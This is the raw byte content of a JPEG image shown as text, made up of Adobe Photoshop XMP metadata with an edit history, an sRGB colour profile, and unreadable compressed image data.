xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)" xmp:CreateDate="2015-08-12T08:40:52-06:00" xmp:MetadataDate="2019-12-03T13:35:22-07:00" xmp:ModifyDate="2019-12-03T13:35:22-07:00" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" xmpMM:DocumentID="adobe:docid:photoshop:90dc98be-e3c9-bd43-aa6c-4c8d5ec2c480" xmpMM:OriginalDocumentID="xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" stEvt:when="2015-08-12T08:40:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:c59fedb7-5aae-dc44-806c-a9ae14d83653" stEvt:when="2015-08-12T10:34:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:70aec4d0-117c-4e82-a61d-a7745e5349a0" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:70aec4d0-117c-4e82-a61d-a7745e5349a0" stRef:documentID="adobe:docid:photoshop:7dbf3126-d713-a744-8bcc-86ce4a28f7ad" stRef:originalDocumentID="xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00"/> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>130277488</rdf:li> <rdf:li>141194698</rdf:li> <rdf:li>145150258</rdf:li> <rdf:li>167191953</rdf:li> <rdf:li>176341593</rdf:li> <rdf:li>178977234</rdf:li> <rdf:li>182272822</rdf:li> <rdf:li>192261204</rdf:li> <rdf:li>193438474</rdf:li> <rdf:li>195689250</rdf:li> <rdf:li>196294602</rdf:li> <rdf:li>228083377</rdf:li> <rdf:li>242265558</rdf:li> <rdf:li>3C195ED08DD181C1E70D74058088D923</rdf:li> <rdf:li>51124270</rdf:li> <rdf:li>55EBD6896B155197C00F14AE15DD5833</rdf:li> <rdf:li>6A0A15811A8FC9AC3A16B564BD642F8C</rdf:li> <rdf:li>73579908</rdf:li> <rdf:li>786951C7142A2AEC38D5A5004E40A752</rdf:li> <rdf:li>85C0BB87BEAE9829B22F9F7DDC288118</rdf:li> <rdf:li>98849039</rdf:li> <rdf:li>A5AC77993D83A50F34AA7C4E8A6D5DC7</rdf:li> <rdf:li>F33669D08BFCBD95F06E1D6DC8085223</rdf:li> <rdf:li>adobe:docid:photoshop:2aadf570-db10-11e5-8cd7-df40e3f5c0ff</rdf:li> <rdf:li>adobe:docid:photoshop:3ad2bde0-36da-11e5-aba8-c6c7ea128f87</rdf:li> <rdf:li>adobe:docid:photoshop:3ae55549-2f11-11e5-8a1e-cca3aa3b1f5b</rdf:li> <rdf:li>adobe:docid:photoshop:46ec2593-3be2-11e5-a44f-893b6bacb806</rdf:li> <rdf:li>adobe:docid:photoshop:59185ead-ccc4-1179-9470-fe1407c09860</rdf:li> <rdf:li>adobe:docid:photoshop:5d4ca717-565e-11e5-83d9-96afab01fb7d</rdf:li> <rdf:li>adobe:docid:photoshop:7e1015e9-5bcf-11e5-82d7-b1b6eadfc164</rdf:li> <rdf:li>adobe:docid:photoshop:7f36621b-addc-11e7-aea5-b4dbe1565c8e</rdf:li> <rdf:li>adobe:docid:photoshop:9510e559-2cae-11e5-a749-d8deb76636bb</rdf:li> <rdf:li>adobe:docid:photoshop:99221731-5be2-294d-9926-ec33347c3f79</rdf:li> <rdf:li>adobe:docid:photoshop:a1d8d42c-8aec-117a-9ce0-d85f44e8821b</rdf:li> <rdf:li>adobe:docid:photoshop:d04f7fa4-5c13-11e5-82d7-b1b6eadfc164</rdf:li> <rdf:li>adobe:docid:photoshop:df2f204d-b651-11e5-bb8e-99bbec9e1c45</rdf:li> <rdf:li>adobe:docid:photoshop:f188381e-5d62-11e5-a1c8-dc3a58737c37</rdf:li> <rdf:li>uuid:2CDD2D0EC944DF11BBB8F27D9F6841CA</rdf:li> <rdf:li>uuid:D670922B660CE611ADAB93AF422C66D6</rdf:li> <rdf:li>xmp.did:0093BA7511206811B1DAAEADD64F896A</rdf:li> <rdf:li>xmp.did:018011740720681180E5B75AA0F739E5</rdf:li> <rdf:li>xmp.did:0180117407206811871F80FDF2C3718E</rdf:li> <rdf:li>xmp.did:0180117407206811871FB6C01BE9F510</rdf:li> <rdf:li>xmp.did:0180117407206811871FBEC38D9105D7</rdf:li> <rdf:li>xmp.did:0180117407206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:0180117407206811871FF2AB4335B888</rdf:li> <rdf:li>xmp.did:018011740720681188C683EA16CE491B</rdf:li> <rdf:li>xmp.did:018011740720681188C68D0E9FB08CA5</rdf:li> <rdf:li>xmp.did:018011740720681188C6C87AF92C64EF</rdf:li> <rdf:li>xmp.did:018011740720681192B0CDEAE74D693B</rdf:li> <rdf:li>xmp.did:028011740720681188C6AF0A6F7FE824</rdf:li> <rdf:li>xmp.did:028011740720681188C6C6A97910AC78</rdf:li> <rdf:li>xmp.did:0380117407206811871FB2718E5E8603</rdf:li> <rdf:li>xmp.did:03801174072068119109CACE15827097</rdf:li> <rdf:li>xmp.did:038011740720681192B0B2B684AE331D</rdf:li> <rdf:li>xmp.did:0480117407206811822AFC40E69A57D6</rdf:li> <rdf:li>xmp.did:04801174072068118C148D3FFC44F7CF</rdf:li> <rdf:li>xmp.did:0580117407206811871FF2DFC48F728E</rdf:li> <rdf:li>xmp.did:05801174072068118A6DDFE128CA40E1</rdf:li> <rdf:li>xmp.did:05801174072068118A6DF5A37A7EB4B7</rdf:li> <rdf:li>xmp.did:0680117407206811871FC7F631C08A65</rdf:li> <rdf:li>xmp.did:0680117407206811871FD9ADEBC05AC9</rdf:li> <rdf:li>xmp.did:0680117407206811BAA9C90DDE484AC6</rdf:li> <rdf:li>xmp.did:078011740720681192B0B2B684AE331D</rdf:li> <rdf:li>xmp.did:08801174072068118C14A81E3999D0D0</rdf:li> <rdf:li>xmp.did:0881930D1920681188C6B23E0DA3D9CA</rdf:li> <rdf:li>xmp.did:098011740720681188C6A094D1E6A3F9</rdf:li> <rdf:li>xmp.did:0A80117407206811871FC7F631C08A65</rdf:li> <rdf:li>xmp.did:0A80117407206811871FD969D92FB0E5</rdf:li> <rdf:li>xmp.did:0A8011740720681188C6D7A592EC9D69</rdf:li> <rdf:li>xmp.did:0A8011740720681192B0EAE56F792B85</rdf:li> <rdf:li>xmp.did:0e6875b8-543f-734c-9035-4a17948bcd0b</rdf:li> <rdf:li>xmp.did:131A06DA1020681188C69193806B1932</rdf:li> <rdf:li>xmp.did:175F8B652C206811871F9C3F3A8A1C0E</rdf:li> <rdf:li>xmp.did:19935B1B1220681197A5BE68DAE7D805</rdf:li> <rdf:li>xmp.did:1F4D49570D206811871FD1AC750C6933</rdf:li> <rdf:li>xmp.did:1F8418E30B20681188C6C166A936D6B2</rdf:li> <rdf:li>xmp.did:2218759B2920681192B0B98D384CD452</rdf:li> <rdf:li>xmp.did:22E7387B1020681188C6D82FD9EEA035</rdf:li> <rdf:li>xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00</rdf:li> <rdf:li>xmp.did:39EDD137112068118A6DD596BA142545</rdf:li> <rdf:li>xmp.did:420BC2ED4A206811871FB39F81FAECA2</rdf:li> <rdf:li>xmp.did:456DCAAC0A20681188C6A9BCC052530E</rdf:li> <rdf:li>xmp.did:4A6880BA172068118A6DE215332FC54A</rdf:li> <rdf:li>xmp.did:4EC83EA60C206811871FF2AB4335B888</rdf:li> <rdf:li>xmp.did:5A53435130206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:6b6c8a71-1c2a-4226-8a5b-05c8742922ca</rdf:li> <rdf:li>xmp.did:706982fc-7d98-40e8-af5c-34d725b5fae1</rdf:li> <rdf:li>xmp.did:707FC7D22F206811871FC47841645D57</rdf:li> <rdf:li>xmp.did:748206EDA31DE9119725FED0EB7940B5</rdf:li> <rdf:li>xmp.did:76D4B8C310206811943DE82709197D15</rdf:li> <rdf:li>xmp.did:7911307E13206811871FC6751E16770B</rdf:li> <rdf:li>xmp.did:7D1099985A206811871F8776FCDA7166</rdf:li> <rdf:li>xmp.did:7DB3BE00292068118A6D84548B7B40A0</rdf:li> <rdf:li>xmp.did:81A7D5F82A206811871FC47841645D57</rdf:li> <rdf:li>xmp.did:859F05911120681188C6C1527B0156A2</rdf:li> <rdf:li>xmp.did:863A0FC29F3AE811BD0DBED084B8F5A4</rdf:li> <rdf:li>xmp.did:867D40201F20681192B0BD9018AEE708</rdf:li> <rdf:li>xmp.did:8685A3F7322068119109C2E60CCDE007</rdf:li> <rdf:li>xmp.did:885D621F1720681188C6F428C73A5134</rdf:li> <rdf:li>xmp.did:9751854B10206811871FFB0658B2D2AF</rdf:li> <rdf:li>xmp.did:C1DE8EBF0F2068118A6DA044F0577970</rdf:li> <rdf:li>xmp.did:C4DE8EBF0F2068118A6DA044F0577970</rdf:li> <rdf:li>xmp.did:CDEFD3061220681192B0F75C6E6D61CB</rdf:li> <rdf:li>xmp.did:CF33DBC20D20681188C6F5FBAB6EEDBA</rdf:li> <rdf:li>xmp.did:D4B0CF55162068118C14B2857F8C4C6C</rdf:li> <rdf:li>xmp.did:E25EBE490A2068118C14EFCE47AE8D3F</rdf:li> <rdf:li>xmp.did:E71424F945206811A7BADFC90BDD9E59</rdf:li> <rdf:li>xmp.did:EA2E99433520681188C6819A55480162</rdf:li> <rdf:li>xmp.did:ECE9CB841020681192B0AC59354E4128</rdf:li> <rdf:li>xmp.did:F409F9F123206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:F4F6D7D84C20681188C6F428C73A5134</rdf:li> <rdf:li>xmp.did:F77F11740720681197CFB2669E13D7A6</rdf:li> <rdf:li>xmp.did:F866F6662B20681188C6CF690D9A65F5</rdf:li> <rdf:li>xmp.did:F8D31357D8A111E492B4A31594B6DD98</rdf:li> <rdf:li>xmp.did:FE7F11740720681188C6A9BCC052530E</rdf:li> <rdf:li>xmp.did:da422971-04e3-d046-ad90-462cb7d1b2d0</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> </rdf:Description> </rdf:RDF> </x:xmpmeta>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 <?xpacket end="w"?>ÿâXICC_PROFILEHLinomntrRGB XYZ Î	1acspMSFTIEC sRGBöÖÓ-HP  cprtP3desc„lwtptðbkptrXYZgXYZ,bXYZ@dmndTpdmddĈvuedL†viewÔ$lumiømeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ óQÌXYZ XYZ o¢8õXYZ b™·…ÚXYZ $ „¶ÏdescIEC http://www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference Viewing Condition in IEC61966-2.1,Reference Viewing Condition in IEC61966-2.1view¤þ_.ÏíÌ\žXYZ L	VPWçmeassig CRT curv
          #(-27;@EJOTY^chmrw|†‹•šŸ¤©®²·¼ÁÆËÐÕÛàåëðöû
          %+28>ELRY`gnu|ƒ‹’š¡©±¹ÁÉÑÙáéòú&/8AKT]gqz„Ž˜¢¬¶ÁËÕàëõ!-8COZfr~Š–¢®ºÇÓàìù -;HUcq~Œš¨¶ÄÓáðþ
          +:IXgw†–¦µÅÕåö'7HYj{Œ¯ÀÑãõ+=Oat†™¬¿Òåø2FZn‚–ª¾Òçû		%	:	O	d	y		¤	º	Ï	å	û
          
          '
          =
          T
          j
          
          ˜
          ®
          Å
          Ü
          ó"9Qi€˜°Èáù*C\uŽ§ÀÙó
          
          
          &
          @
          Z
          t
          Ž
          ©
          Ã
          Þ
          ø.Id›¶Òî	%A^z–³Ïì	&Ca~›¹×õ1OmŒªÉè&Ed„£Ãã#Ccƒ¤Åå'Ij‹­Îð4Vx›½à&Il²ÖúAe‰®Ò÷@eНÕú Ek‘·Ý*QwžÅì;cвÚ*R{£ÌõGp™Ãì@j”¾é>i”¿ê  A l ˜ Ä ð!!H!u!¡!Î!û"'"U"‚"¯"Ý#
          #8#f#”#Â#ð$$M$|$«$Ú%	%8%h%—%Ç%÷&'&W&‡&·&è''I'z'«'Ü(
          (?(q(¢(Ô))8)k))Ð**5*h*›*Ï++6+i++Ñ,,9,n,¢,×--A-v-«-á..L.‚.·.î/$/Z/‘/Ç/þ050l0¤0Û11J1‚1º1ò2*2c2›2Ô3
          3F33¸3ñ4+4e4ž4Ø55M5‡5Â5ý676r6®6é7$7`7œ7×88P8Œ8È99B99¼9ù:6:t:²:ï;-;k;ª;è<'<e<¤<ã="=a=¡=à> >`> >à?!?a?¢?â@#@d@¦@çA)AjA¬AîB0BrBµB÷C:C}CÀDDGDŠDÎEEUEšEÞF"FgF«FðG5G{GÀHHKH‘H×IIcI©IðJ7J}JÄKKSKšKâL*LrLºMMJM“MÜN%NnN·OOIO“OÝP'PqP»QQPQ›QæR1R|RÇSS_SªSöTBTTÛU(UuUÂVV\V©V÷WDW’WàX/X}XËYYiY¸ZZVZ¦Zõ[E[•[å\5\†\Ö]']x]É^^l^½__a_³``W`ª`üaOa¢aõbIbœbðcCc—cëd@d”dée=e’eçf=f’fèg=g“géh?h–hìiCišiñjHjŸj÷kOk§kÿlWl¯mm`m¹nnknÄooxoÑp+p†pàq:q•qðrKr¦ss]s¸ttptÌu(u…uáv>v›vøwVw³xxnxÌy*y‰yçzFz¥{{c{Â|!||á}A}¡~~b~Â#„å€G€¨
          kÍ‚0‚’‚ôƒWƒº„„€„ã…G…«††r†×‡;‡ŸˆˆiˆÎ‰3‰™‰þŠdŠÊ‹0‹–‹üŒcŒÊ1˜ÿŽfŽÎ6žnÖ‘?‘¨’’z’ã“M“¶” ”Š”ô•_•É–4–Ÿ—
          —u—à˜L˜¸™$™™üšhšÕ›B›¯œœ‰œ÷dÒž@ž®ŸŸ‹Ÿú i Ø¡G¡¶¢&¢–££v£æ¤V¤Ç¥8¥©¦¦‹¦ý§n§à¨R¨Ä©7©©ªª««u«é¬\¬Ð­D­¸®-®¡¯¯‹°°u°ê±`±Ö²K²Â³8³®´%´œµµŠ¶¶y¶ð·h·à¸Y¸Ñ¹J¹Âº;ºµ».»§¼!¼›½½¾
          ¾„¾ÿ¿z¿õÀpÀìÁgÁãÂ_ÂÛÃXÃÔÄQÄÎÅKÅÈÆFÆÃÇAÇ¿È=ȼÉ:ɹÊ8Ê·Ë6˶Ì5̵Í5͵Î6ζÏ7ϸÐ9кÑ<ѾÒ?ÒÁÓDÓÆÔIÔËÕNÕÑÖUÖØ×\×àØdØèÙlÙñÚvÚûۀÜ܊ÝݖÞÞ¢ß)߯à6à½áDáÌâSâÛãcãëäsäü儿
          æ–çç©è2è¼éFéÐê[êåëpëûì†ííœî(î´ï@ïÌðXðåñrñÿòŒóó§ô4ôÂõPõÞömöû÷Šøø¨ù8ùÇúWúçûwüü˜ý)ýºþKþÜÿmÿÿÿîAdobed@ÿۄÿÀv°ÿÝ–ÿÄ¢	
          	
          	u!"1A2#	QBa$3Rqb‘%C¡±ð&4r
          ÁÑ5'áS6‚ñ’¢DTsEF7Gc(UVW²ÂÒâòdƒt“„e£³ÃÓã)8fóu*9:HIJXYZghijvwxyz…†‡ˆ‰Š”•–—˜™š¤¥¦§¨©ª´µ¶·¸¹ºÄÅÆÇÈÉÊÔÕÖרÙÚäåæçèéêôõö÷øùúm!1"AQ2aqB#‘R¡b3	±$ÁÑCrðá‚4%’ScDñ¢²&5T6Ed'
          sƒ“FtÂÒâòUeuV7„…£³ÃÓãó)”¤´ÄÔäô•¥µÅÕåõ(GWf8v†–¦¶ÆÖæögw‡—§·Ç×ç÷HXhxˆ˜¨¸ÈØèø9IYiy‰™©¹ÉÙéù*:JZjzŠšªºÊÚêúÿÚ?Ù_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷suW_ÎÔ{Ç~í¬z¨gÆTd¢›,ˆÀ2»â©>ã"ˆàðÆ ãÚëm³p¼­­Ó֘ý¦ƒùõ`¬xƒ¯önþ9ÿÏÏÆç£sõ“Úßêæõÿ(-þô¿ô[ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðô½ÚßÔ{öª:
          ¥Ø;g/‘›ˆqi‘Ž“+=¾¿o‹È
          L„ú:#k~}£¹Ú÷E/qg"§­*?h¨þ}h£+ЩíUëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯ÿÐÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ê¶¾cüªÊíúž§ë\‹có‘Á÷¿tQÉjÌOÝD²ÅƒÃN¼ÓdššEzŠ•õÀR2²ë1¹o`Žáp¾JÅ^Å<
          ?zŠð|N8½uînTäÓMS4µËQQ<4óÍ#Ë4ÒÈÅä–Y\³É$ŽIf$’MϹ ¥b÷¾½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ê£­õï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uÉãt’7h䍕Ñъº:ÊèÊC++‚9߉Pðë]Z?œ¦cԝ›”—)&BÔ»/td%2d
          j)1mìÍ\„½wÞ*‘IQ!3y­òGãó&ÁFû…Ši¦]G
          *yŽÎ(jđþ%êÑ=:c¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺ÿÑÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¨õU	IKSU %) š¡Àú”†6‘€úóe÷µ™Tq'¯u¬~=_¹s¹Å–ª2™Ü¥~_!;j&Z̍Tµu/ÍÈYM‡àqîp†QC¤h °
